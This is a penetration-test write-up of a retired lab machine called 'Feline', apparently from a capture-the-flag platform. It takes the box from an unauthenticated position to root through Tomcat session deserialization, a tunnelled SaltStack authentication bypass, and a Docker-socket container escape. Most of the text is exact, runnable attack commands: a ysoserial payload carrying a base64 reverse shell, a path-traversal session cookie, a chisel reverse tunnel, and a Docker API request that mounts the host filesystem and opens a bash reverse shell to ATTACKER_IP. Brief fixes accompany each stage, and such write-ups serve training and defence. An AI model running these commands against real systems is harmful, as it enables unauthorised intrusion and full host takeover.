Feline
Summary
Target feline ($TARGET) was fully compromised from an unauthenticated network position to root in three chained stages. A publicly accessible Apache Tomcat 9.0.27 instance hosted a file-upload application that stored files under my own filenames; combined with a Java deserialization flaw in Tomcat's session-persistence feature (CVE-2020-9484), this produced remote code execution as the tomcat service account.
Local port enumeration revealed an unpatched SaltStack salt-master bound exclusively to the loopback interface; a chisel port-forward tunnel exposed it to me, and an authentication-bypass vulnerability (CVE-2020-11651/CVE-2020-11652) gave arbitrary command execution inside a Docker container running as root. That container had the host Docker socket mounted inside it; by querying the Docker API directly over the socket, I created a new container mounting the entire host filesystem, chroot'd into it, and executed a shell as root on the underlying host — achieving complete system compromise.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"Attack path — how the box was taken
Exact commands 2
nmap -Pn -p- --min-rate 5000 -T4 -sV $TARGETcurl -sS -L http://$TARGET:8080/service/Exact commands 4
nc -lvnp 4444java -jar ysoserial.jar CommonsCollections2 'bash -c {echo,<BASE64_REVSHELL>}|{base64,-d}|{bash,-i}' > f.sessioncurl -sS -F 'file=@f.session;filename=f.session' http://$TARGET:8080/service/curl -s http://$TARGET:8080/ -H 'Cookie: JSESSIONID=../../../../../../../opt/samples/uploads/f'FixPatch Tomcat to 9.0.36+ and sanitize upload filenames to eliminate the deserialization RCE primitiveCritical
Exact commands 1
id; find / -name user.txt -type f -readable 2>/dev/null -exec sh -c 'echo FILE:$1; cat "$1"' _ {} \;Exact commands 2
ss -lntp | grep -E ':4505|:4506'cat /etc/salt/master 2>/dev/null; ls /etc/salt/ 2>/dev/nullExact commands 4
chisel server --reverse --port 9001setsid -f ./chisel client $ATTACKER_IP:9001 R:14506:127.0.0.1:4506 &git clone https://github.com/jasperla/CVE-2020-11651-poc && cd CVE-2020-11651-poc && python3 -m venv saltvenv && saltvenv/bin/pip install salt looseversion distrosaltvenv/bin/python exploit.py --master 127.0.0.1 --port 14506 --exec 'id'FixPatch SaltStack and restrict salt-master port access to trusted hosts onlyCritical
Exact commands 5
saltvenv/bin/python exploit.py --master 127.0.0.1 --port 14506 --exec 'ls -la /var/run/docker.sock'saltvenv/bin/python exploit.py --master 127.0.0.1 --port 14506 --exec 'curl -s --unix-socket /var/run/docker.sock http://localhost/images/json'nc -lvnp 4446saltvenv/bin/python exploit.py --master 127.0.0.1 --port 14506 --exec "curl -sS --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' -X POST -d '{\"Image\":\"sandbox\",\"Cmd\":[\"/bin/sh\",\"-c\",\"chroot /mnt bash -c \\\"bash -i >& /dev/tcp/$ATTACKER_IP/4446 0>&1\\\"\"],\"HostConfig\":{\"Binds\":[\"/:/mnt:rw\"]}}' http://localhost/containers/create"saltvenv/bin/python exploit.py --master 127.0.0.1 --port 14506 --exec "curl -sS --unix-socket /var/run/docker.sock -X POST http://localhost/containers/<container_id>/start"FixRemove the Docker socket bind-mount from all containers that do not strictly require direct daemon accessCritical
Exact commands 1
id; hostname; cat /root/root.txtAttack patterns used
The transferable techniques behind this compromise.
Insecure DeserializationWeb · Service RCET1190
What it is
Applications that deserialize externally controlled data (Java, .NET, PHP, Python pickle) can be driven to instantiate 'gadget chains' — sequences of existing classes whose side effects during deserialization culminate in code execution. ysoserial/ysoserial.net generate the payloads; ViewState and Java RMI/JMX are common entry points.
Why it works
Deserializers reconstruct arbitrary object graphs and invoke magic methods on untrusted input. Remediate by avoiding native deserialization of untrusted data, using signed/encrypted state, and enforcing strict type allow-lists.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| 8080/tcp | http Apache Tomcat 9.0.27 |